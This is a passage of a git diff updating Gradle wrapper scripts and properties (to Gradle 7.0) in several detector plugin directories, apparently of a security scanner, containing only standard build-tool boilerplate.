+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/hadoop/yarn/gradlew.bat b/google/detectors/exposedui/hadoop/yarn/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/hadoop/yarn/gradlew.bat +++ b/google/detectors/exposedui/hadoop/yarn/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/jenkins/gradlew b/google/detectors/exposedui/jenkins/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/jenkins/gradlew +++ b/google/detectors/exposedui/jenkins/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/jenkins/gradlew.bat b/google/detectors/exposedui/jenkins/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/jenkins/gradlew.bat +++ b/google/detectors/exposedui/jenkins/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME 
diff --git a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/jupyter/gradlew b/google/detectors/exposedui/jupyter/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/jupyter/gradlew +++ b/google/detectors/exposedui/jupyter/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
